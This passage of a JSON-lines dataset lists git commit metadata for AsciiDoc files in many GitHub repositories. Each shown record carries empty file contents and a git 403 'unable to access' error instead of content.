error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65fb392a50f208fcdd45d73866f6e26f6b85c0c3","subject":"Update 2016-07-03-Rock-climbing.adoc","message":"Update 2016-07-03-Rock-climbing.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-03-Rock-climbing.adoc","new_file":"_posts\/2016-07-03-Rock-climbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a1e971bd04f51c43a9208ba0d0b9baa30669eb","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d00d9805277f5e0287cea0cd5a2090d46b62d63","subject":"Update 2016-12-23-A-Little-Poem.adoc","message":"Update 2016-12-23-A-Little-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2016-12-23-A-Little-Poem.adoc","new_file":"_posts\/2016-12-23-A-Little-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f66b3eb9940e0d4a53ba025f3503ec7d9e3a1cbd","subject":"Update 2017-01-25 Test asciidoc.adoc","message":"Update 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e02932d321a43c94f5b06f439a9e65cef41b958f","subject":"Added RELEASE.adoc","message":"Added RELEASE.adoc\n","repos":"obsidian-toaster\/generator-backend,obsidian-toaster\/generator-backend","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obsidian-toaster\/generator-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b4da4e25e473be1386a6a0016f743f3d746a5ed","subject":"More minor edits to style guide","message":"More minor edits to style guide","repos":"pstirparo\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,Onager\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a666582ce74bb113508fc13f9452691045e7f6db","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6491ce8547a5a90c6e0fe3e97e8f6f909087798","subject":"4.9 rn dummy","message":"4.9 rn dummy\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-4-9-release-notes.adoc","new_file":"virt\/virt-4-9-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1234e1292c757ba473a5457a45ddb644f07bdd60","subject":"Update 2015-02-10-My-Documents-Title.adoc","message":"Update 2015-02-10-My-Documents-Title.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-02-10-My-Documents-Title.adoc","new_file":"_posts\/2015-02-10-My-Documents-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d7c14074171ade4a7ca60166779a6d8cbe1a2b","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eff3afb81b339185c2018483489e3c9fd1415588","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49ab918720183f208e4047abc987db7ab26c4427","subject":"Hawkular Metrics 0.11.0 - Release","message":"Hawkular Metrics 0.11.0 - Release\n","repos":"jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/12\/hawkular-metrics-0.11.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/12\/hawkular-metrics-0.11.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09f755a7bb7733f546152121b966fe0173094f92","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/12\/23\/deref.adoc","new_file":"content\/news\/2021\/12\/23\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"dd292b54d345358108ef611fe8b9d0710020b5c4","subject":"12-20 Release (#398)","message":"12-20 Release (#398)\n\n* fix up date, language tweak\r\n\r\n* language tweak","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2021-12-20-release.adoc","new_file":"content\/news\/2021-12-20-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1dafb0f5b536bc634499297026d17759a6084595","subject":"Fix links","message":"Fix links","repos":"destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts,destijl\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a705c4d7c0011ad85a90ebe5623c38c7fdd8ba9","subject":"Update 2016-6-26-first-title.adoc","message":"Update 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-first-title.adoc","new_file":"_posts\/2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"729b8341cebb09ce6a99e0563343b974ea71deac","subject":"Update 2016-06-27-file-getput-content.adoc","message":"Update 2016-06-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-27-file-getput-content.adoc","new_file":"_posts\/2016-06-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"406f1cfb835350dd11b8dee5c1a807ca6e7000bf","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0816d1a890b674a72b8fdd3466ebef9d2ba6b911","subject":"Update 2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","message":"Update 2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","new_file":"_posts\/2018-05-24-Watson-Primer-Yousef-Hashimi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbe65c10026d342cc8031c9604695c95a4ce71f0","subject":"Links","message":"Links\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d9264b4418c165549cdcf5238aca21b8c661935","subject":"add section: Installing PostgreSQL extensions","message":"add section: Installing PostgreSQL extensions\n\n'unaccent' case","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d16a4ffc14fd9cc0a61d2e0b91b6a08c743fca37","subject":"removed unecessary comma + init git submodule","message":"removed unecessary comma + init git submodule","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d70cf1e7a5b4308e2b5858d59f79801517b96a38","subject":"y2b create post Amazing 3D Hologram Using Any Smartphone!","message":"y2b create post Amazing 3D Hologram Using Any Smartphone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-22-Amazing-3D-Hologram-Using-Any-Smartphone.adoc","new_file":"_posts\/2016-07-22-Amazing-3D-Hologram-Using-Any-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e1a78f027a9908b5f7f93d68356c3f96598897f","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a32b3b44bced57d34e7dd233a78203192b8646ad","subject":"Update 2016-07-22-Prova-math.adoc","message":"Update 2016-07-22-Prova-math.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Prova-math.adoc","new_file":"_posts\/2016-07-22-Prova-math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e29a9d2a2bf7a77cfdcc53c6f4e24fdd8871b6f5","subject":"Update 2016-08-04-2016-08-04.adoc","message":"Update 2016-08-04-2016-08-04.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-04-2016-08-04.adoc","new_file":"_posts\/2016-08-04-2016-08-04.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bca6bdd0bc19d39a89f2065e0f79ccebdd4d739","subject":"2016-08-04-BackToWork.adoc","message":"2016-08-04-BackToWork.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-08-04-BackToWork.adoc","new_file":"_posts\/2016-08-04-BackToWork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5044d38cc7edf1e4adf6f8f165474172ba7168ec","subject":"Update 2017-02-21-4test-four.adoc","message":"Update 2017-02-21-4test-four.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-4test-four.adoc","new_file":"_posts\/2017-02-21-4test-four.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cc3c2780acfdaae998e0b5bea458dc9e7c66c47","subject":"Update 2015-09-19-JSON-syntax.adoc","message":"Update 2015-09-19-JSON-syntax.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62b1efc6e30682a4446841883cae8b0baec7f158","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c1c6da74f63cb5ced38c546dc0f344e8cdbe58e","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857567594e73b1e4febd64693a70343074c0cacc","subject":"Added documentation for client config IP based configuration","message":"Added documentation for client config IP based configuration\n\nSigned-off-by: Ido Barnea <3a6e28cf60eb2f9d9d6e5ab6275926d9a599fe66@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2e4f6561a2b206abd5da799194b6943916df0fb","subject":"Update 2016-12-28-File-Maker-Openfire-API-Integration.adoc","message":"Update 2016-12-28-File-Maker-Openfire-API-Integration.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2016-12-28-File-Maker-Openfire-API-Integration.adoc","new_file":"_posts\/2016-12-28-File-Maker-Openfire-API-Integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2601257ac667e26cb785e844df6963756cea3d7c","subject":"Removed non ready JFace table viewer","message":"Removed non ready JFace table viewer\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"SWT.adoc","new_file":"SWT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d19678fffd82f52d9539087b6c8b6955c691fd","subject":"Update 2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","message":"Update 2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","new_file":"_posts\/2015-10-12-The-Internet-of-Things-and-Open-Datas-Last-Mile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f72d6654c542bb58ff5795262ac83df46e502e2d","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/14\/deref.adoc","new_file":"content\/news\/2022\/04\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b44b9b3c66ee15fe307b856b2633225c962386c8","subject":"Update 2017-01-30-Minecraft-O-Basico-01.adoc","message":"Update 2017-01-30-Minecraft-O-Basico-01.adoc","repos":"Andy4Craft\/andy4craft.github.io,Andy4Craft\/andy4craft.github.io,Andy4Craft\/andy4craft.github.io,Andy4Craft\/andy4craft.github.io","old_file":"_posts\/2017-01-30-Minecraft-O-Basico-01.adoc","new_file":"_posts\/2017-01-30-Minecraft-O-Basico-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Andy4Craft\/andy4craft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d3e1c59d7b5852ab45b2f4038cdf5a16f29a382","subject":"Update 2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","message":"Update 2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","new_file":"_posts\/2016-09-12-Ensemble-DE-analysis-of-RNA-Seq-data-sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fde805cd6caeabb20fefc05306a301b9b0289e1c","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9fdf8ffecd3ae6fdab4cb6435276c4a90df618e","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5ef765d03c3fd1a6ab9b6798e1ba5559dff6c1","subject":"Update 2016-07-03-What-it-is-What-is-it.adoc","message":"Update 2016-07-03-What-it-is-What-is-it.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-03-What-it-is-What-is-it.adoc","new_file":"_posts\/2016-07-03-What-it-is-What-is-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad8a4779c92934242773d1fd7c8d359334c8e120","subject":"Publish 2015-2-10-the-manmoy-of-2014.adoc","message":"Publish 2015-2-10-the-manmoy-of-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-the-manmoy-of-2014.adoc","new_file":"2015-2-10-the-manmoy-of-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2eeca20f4a495d7c477bf5c7254095cf3b75c5d","subject":"add docs","message":"add docs\n","repos":"tfarina\/ninja,martine\/ninja,pck\/ninja,rnk\/ninja,mohamed\/ninja,ctiller\/ninja,sorbits\/ninja,syntheticpp\/ninja,mydongistiny\/ninja,tfarina\/ninja,ndsol\/subninja,jimon\/ninja,purcell\/ninja,nocnokneo\/ninja,kimgr\/ninja,rnk\/ninja,fuchsia-mirror\/third_party-ninja,ignatenkobrain\/ninja,ikarienator\/ninja,ctiller\/ninja,liukd\/ninja,TheOneRing\/ninja,pck\/ninja,nickhutchinson\/ninja,bmeurer\/ninja,maruel\/ninja,jimon\/ninja,colincross\/ninja,hnney\/ninja,kissthink\/ninja,ndsol\/subninja,atetubou\/ninja,ignatenkobrain\/ninja,moroten\/ninja,tfarina\/ninja,jimon\/ninja,metti\/ninja,rjogrady\/ninja,iwadon\/ninja,dabrahams\/ninja,metti\/ninja,mydongistiny\/ninja,rnk\/ninja,mgaunard\/ninja,nicolasdespres\/ninja,mgaunard\/ninja,hnney\/ninja,AoD314\/ninja,TheOneRing\/ninja,pathscale\/ninja,jimon\/ninja,ignatenkobrain\/ninja,iwadon\/ninja,maruel\/ninja,tfarina\/ninja,iwadon\/ninja,nico\/ninja,fuchsia-mirror\/third_party-ninja,Qix-\/ninja,sorbits\/ninja,TheOneRing\/ninja,Qix-\/ninja,nicolasdespres\/ninja,jsternberg\/ninja,sxlin\/dist_ninja,Maratyszcza\/ninja-pypi,guiquanz\/ninja,sxlin\/dist_ninja,mutac\/ninja,vvvrrooomm\/ninja,nico\/ninja,synaptek\/ninja,nocnokneo\/ninja,fuchsia-mirror\/third_party-ninja,dorgonman\/ninja,colincross\/ninja,ctiller\/ninja,lizh06\/ninja,sxlin\/dist_ninja,synaptek\/ninja,jsternberg\/ninja,hnney\/ninja,syntheticpp\/ninja,dabrahams\/ninja,jendrikillner\/ninja,fifoforlifo\/ninja,ilor\/ninja,colincross\/ninja,yannicklm\/ninja,Ju2ender\/ninja,vvvrrooomm\/ninja,ninja-build\/ninja,pathscale\/ninja,sxlin\/dist_ninja,Qix-\/ninja,glensc\/ninja,vvvrrooomm\/ninja,mydongistiny\/ninja,drbo\/ninja,hnney\/ninja,mohamed\/ninja,mgaunard\/ninja,colincross\/ninja,nickhutchinson\/n